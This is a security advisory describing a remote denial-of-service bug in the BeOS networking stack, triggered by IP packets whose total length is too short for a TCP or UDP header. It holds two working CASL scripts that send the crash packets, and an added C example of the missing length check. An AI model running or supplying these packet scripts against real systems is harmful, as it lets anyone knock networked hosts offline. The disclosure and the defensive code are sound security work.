COMMAND
kernel
SYSTEMS AFFECTED
BeOS
PROBLEM
Tim Newsham found the following. The BeOS networking stack crashes
when certain malformed IP packets are sent to it. This document
describes two such packets. The first is an IP packet with the
protocol field set to TCP: if the IP total length field is set to
a value shorter than 40, the networking process crashes on
reception. Similarly, an IP packet with the protocol field set to
UDP and an IP total length of less than 28 also crashes the stack.
The lengths 40 and 28 are the combined minimum sizes of the IP and
TCP headers (20 + 20 bytes) and of the IP and UDP headers (20 + 8
bytes) respectively; the stack goes on to parse a transport header
that the packet is too short to contain. A single unauthenticated
packet is enough to trigger the crash, so this is a remote denial
of service. Because the networking stack is a separate process in
BeOS, it may be easily restarted after it crashes.
Two CASL scripts which demonstrate the bug are listed below:
Script 1:
=========
#!/usr/local/casl/bin/casl
#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"
srchost = 10.0.0.1;
dsthost = 10.0.0.2;
IPH = copy UDPIP;
IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 27;
packet = [ IPH ];
ip_output(packet);
Script 2:
=========
#!/usr/local/casl/bin/casl
#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"
srchost = 10.0.0.1;
dsthost = 10.0.0.2;
IPH = copy TCPIP;
IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 39;
packet = [ IPH ];
ip_output(packet);
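The defect described above is a missing length check before the
transport header is parsed. The following C program is an added
example, not BeOS code and not part of the original advisory: it
shows the bounds check a receiving stack should perform on the IP
total length before dispatching to TCP or UDP, and runs it against
constructed packets that mirror the two CASL scripts (protocol UDP
with ip_length 27, protocol TCP with ip_length 39, source 10.0.0.1,
destination 10.0.0.2). The function names, the verdict codes and
the zero-padded receive buffer are assumptions made for this
example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define PROTO_TCP 6
#define PROTO_UDP 17
#define IP_MIN_HDR 20      /* IPv4 header with ihl = 5 */
#define TCP_MIN_HDR 20     /* TCP header with data offset = 5 */
#define UDP_HDR 8

enum ip_verdict {
    IP_OK = 0,
    IP_TRUNCATED,        /* fewer than 20 bytes were received */
    IP_BAD_VERSION,
    IP_BAD_IHL,          /* header length field below 5 words */
    IP_BAD_TOTLEN,       /* total length < header, or > bytes received */
    IP_SHORT_TRANSPORT,  /* total length cannot hold the TCP/UDP header */
    IP_OTHER_PROTO       /* not TCP/UDP; not covered by this example */
};

/* Sanity-check an IPv4 packet before handing it to the transport layer.
   This is the check whose absence lets a 27-byte "UDP" or 39-byte "TCP"
   packet reach a parser that assumes a full transport header exists. */
enum ip_verdict ip_input_check(const uint8_t *buf, size_t buflen)
{
    if (buflen < IP_MIN_HDR)
        return IP_TRUNCATED;

    unsigned version = buf[0] >> 4;
    unsigned ihl     = (buf[0] & 0x0f) * 4u;          /* header bytes */
    unsigned totlen  = ((unsigned)buf[2] << 8) | buf[3];
    uint8_t  proto   = buf[9];

    if (version != 4)
        return IP_BAD_VERSION;
    if (ihl < IP_MIN_HDR)
        return IP_BAD_IHL;
    /* Both directions matter: the claimed length must cover the IP header
       and must not exceed what was actually received. */
    if (totlen < ihl || totlen > buflen)
        return IP_BAD_TOTLEN;

    size_t need;
    switch (proto) {
    case PROTO_TCP: need = TCP_MIN_HDR; break;
    case PROTO_UDP: need = UDP_HDR;     break;
    default:        return IP_OTHER_PROTO;
    }
    if ((size_t)totlen - ihl < need)
        return IP_SHORT_TRANSPORT;   /* drop; do not parse the transport header */
    return IP_OK;
}

/* Constructed test packet: a bare 20-byte IPv4 header (ihl = 5) with the
   given protocol and total length, zero-padded to `cap` bytes so that the
   receive buffer is never shorter than the length the header claims. */
static size_t build_packet(uint8_t *out, size_t cap, uint8_t proto, uint16_t ip_len)
{
    if (cap < IP_MIN_HDR)
        return 0;
    memset(out, 0, cap);
    out[0] = 0x45;                       /* version 4, ihl 5 */
    out[2] = (uint8_t)(ip_len >> 8);
    out[3] = (uint8_t)(ip_len & 0xff);
    out[8] = 64;                         /* TTL */
    out[9] = proto;
    out[12] = 10; out[13] = 0; out[14] = 0; out[15] = 1;   /* src 10.0.0.1 */
    out[16] = 10; out[17] = 0; out[18] = 0; out[19] = 2;   /* dst 10.0.0.2 */
    /* header checksum left zero: it is irrelevant to the length check */
    return cap;
}

/* Build a constructed packet and return the stack's verdict on it. */
enum ip_verdict check_constructed(uint8_t proto, uint16_t ip_len)
{
    uint8_t pkt[64];
    size_t n = build_packet(pkt, sizeof pkt, proto, ip_len);
    return ip_input_check(pkt, n);
}

int main(void)
{
    printf("UDP, ip_length 27: verdict %d\n", check_constructed(PROTO_UDP, 27));
    printf("TCP, ip_length 39: verdict %d\n", check_constructed(PROTO_TCP, 39));
    printf("UDP, ip_length 28: verdict %d\n", check_constructed(PROTO_UDP, 28));
    printf("TCP, ip_length 40: verdict %d\n", check_constructed(PROTO_TCP, 40));
    return 0;
}
```

The two packets from the CASL scripts are rejected with
IP_SHORT_TRANSPORT, while the same packets at lengths 28 and 40 pass.
Note that a stack must also reject a total length larger than the
number of bytes actually received; checking only the transport
minimum would still let a short frame with a large claimed length
through.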
SOLUTION
No fix is available from Be. A bug report has been filed with Be
and assigned the bug number 20000405-18674. Be has marked the bug
as "Will Not Fix" with the comment "The entire networking system
will be replaced soon." Until then, the networking process must be
restarted after each crash.
This bug was found with the help of the ISIC utility by Mike
Frantzen.